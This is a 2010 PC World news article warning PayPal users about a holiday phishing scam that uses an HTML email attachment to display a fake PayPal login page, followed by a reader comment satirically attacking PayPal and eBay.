PayPal users beware of holiday phishing scam

The holiday shopping season means more people making more online purchases -- a prime opportunity for phishing scams
  • (PC World (US online))
  • — 17 November, 2010 07:27

With Black Friday quickly approaching, and retailers racing to outdo each other with earlier and earlier deals, it is safe to say that the holiday shopping season has begun. If you're shopping online, though, and paying with PayPal -- be warned. There is a phishing attack targeted just for you.

The holidays come with a dramatic spike in shopping, and nobody appreciates the increase in online commerce more than cyber criminals. While you're preparing for a Thanksgiving celebration of beer and watching the Detroit Lions make a mockery of professional football...Hey, don't judge. You try supporting a team that has been consistently sad for 60 years and see if you aren't a little bitter. Fine. While you're preparing for a traditional Thanksgiving feast and plotting your Black Friday shopping strategy, malware developers are hard at work finding ways to capitalize on the shopping season.

PayPal is established as a leading method of online payments. It is an integral part of eBay purchasing -- a very popular way to acquire gifts during the holiday season, and it is widely accepted as a method of payment by online retailers of all sorts. It makes sense that cyber criminals would try to capitalize on the spike in PayPal transactions to catch naïve or unsuspecting users off guard.

AppRiver's Troy Gill has uncovered just such a scam. "Since so many people use PayPal in conjunction with the impending holiday shopping spree, scammers are looking to take full advantage of unwary consumers. The latest PayPal related scam targets PayPal users via email. Unlike most of the PayPal scams that we have seen in the past that included a link in the body of the message, these have an attached HTML. When the attachment is clicked a Java Script will produce a Phishing page that mimics a legitimate PayPal page. The input information is then sent off to another domain that will make it available for the cybercriminals."

As Gill notes, this attack attempts to dupe victims by using an attachment as opposed to a link. Granted, users should be conditioned to avoid both links and file attachments in suspicious or questionable e-mails, but just switching things up from the normal malicious URL might be enough to snare some unwary users.

Once the attackers have the PayPal credentials entered on the spoofed PayPal page, they can transfer the funds out of the PayPal account, make purchases using the money in the PayPal account, request funds to be sent to the PayPal account, or anything else the legitimate account holder is normally able to do with a PayPal account.

Most avid PayPal customers hopefully know better than to fall for such a thing, but with the holidays and the spike in online shopping comes a deluge of newbies who know enough to use PayPal to make purchases, but aren't seasoned in how to protect it.

Gill warns, "During the next few months you should be aware that you will be a broader target for scammers looking to take advantage of your increased purchasing activity. Since most people will be making a far greater number of purchases on their credit cards around the holidays they would be less likely to notice fraudulent activity on their cards."

Just remember the mantra that common sense and cautious skepticism will prevent almost all attacks. Happy Holidays!

Keep up with the latest tech news, reviews and previews by subscribing to the Good Gear Guide newsletter.

Tony Bradley

PC World (US online)
Topics: online security, spam, antispam, security, viruses, shopping, paypal, phishing

Comments

Philip Cohen

1

Draft Media Release re PayPal

“It is with great sadness that eBay’s Chief Headless Turkey, John Donahoe, announces the probable demise of eBay’s most ugly daughter, PayPal. Donahoe says that PayPal is likely to be stricken by particularly virulent strains of Visa+CyberSource and Mastercard Open Platform, and these afflictions are greatly aggravated by PayPal’s insurmountable lack of direct financial institutions support and a great deal of PayPal merchant dissatisfaction, particularly with respect to PayPal’s grossly unfair, “all responsibility avoiding” user agreement, primitive risk management processes, and grossly unprofessional, buyer-biased and fraud-facilitating (indeed, apparently non existent) transactions mediation, to name just a few of the problems that PayPal merchants have to endure.

“Donahoe says that PayPal’s health may therefore be expected to deteriorate and, if ultimately not completely incapacitated, will most likely be eventually confined to its mandatory offering on what little there will be, by then, left of the Donahoe-devastated eBay marketplaces. There is no cure for this condition, and the “eBafia Don” is particularly saddened by the inevitable presumption that it is unlikely that PayPal, will be able to continue to underpin eBay’s sagging bottom line too far into the future.”

Yes, it’s a send-up but, still, it accurately describes PayPal’s most unprofessional and “clunky” operation. The fact is, had the developers of the original “bankcard” concept ever behaved the way PayPal behaves towards its payees in particular, credit/debit cards may never have gotten off the ground, and we would probably still be paying for all our purchases with bits of paper and little metal discs.

It should also be emphasized that all the payments processors that do not have the direct underlying risk-managing and real transaction mediation support of the financial institutions that are ultimately involved in the transaction, as does the likes of Visa/Mastercard, suffer the same handicaps that PayPal suffers. The “banks” may be disliked by some but they at least supply a “professional” payments processing service.

Any off-eBay merchant thinking of voluntarily offering PayPal would be wise to first peruse the very many PayPal merchant horror stories that abound on the internet. A detailed examination of and prognosis for PayPal, (including a link to the “PayPal Horror Tour”) at:
http://forums.auctionbytes.com/vbulletin/showthread.php?t=23309

Shill Bidding on eBay: Case Study #4
This latest study provides an indication of eBay’s desperation to mitigate lessening sales activity and very effectively demonstrates eBay’s effective aiding and abetting of criminal shill bidding “wire fraud” activity by unscrupulous professional sellers on unsuspecting buyers:
http://forums.auctionbytes.com/vbulletin/showthread.php?t=23540

eBay/PayPal/Donahoe: Dead Men Walking.

Comments are now closed.

Latest News Articles

Most Popular Articles

Follow Us

GGG Evaluation Team

Kathy Cassidy

STYLISTIC Q702

First impression on unpacking the Q702 test unit was the solid feel and clean, minimalist styling.

Anthony Grifoni

STYLISTIC Q572

For work use, Microsoft Word and Excel programs pre-installed on the device are adequate for preparing short documents.

Steph Mundell

LIFEBOOK UH574

The Fujitsu LifeBook UH574 allowed for great mobility without being obnoxiously heavy or clunky. Its twelve hours of battery life did not disappoint.

Andrew Mitsi

STYLISTIC Q702

The screen was particularly good. It is bright and visible from most angles, however heat is an issue, particularly around the Windows button on the front, and on the back where the battery housing is located.

Simon Harriott

STYLISTIC Q702

My first impression after unboxing the Q702 is that it is a nice looking unit. Styling is somewhat minimalist but very effective. The tablet part, once detached, has a nice weight, and no buttons or switches are located in awkward or intrusive positions.

Resources

Best Deals on GoodGearGuide

Compare & Save

Deals powered by WhistleOut
WhistleOut

Latest Jobs

Don’t have an account? Sign up here

Don't have an account? Sign up now

Forgot password?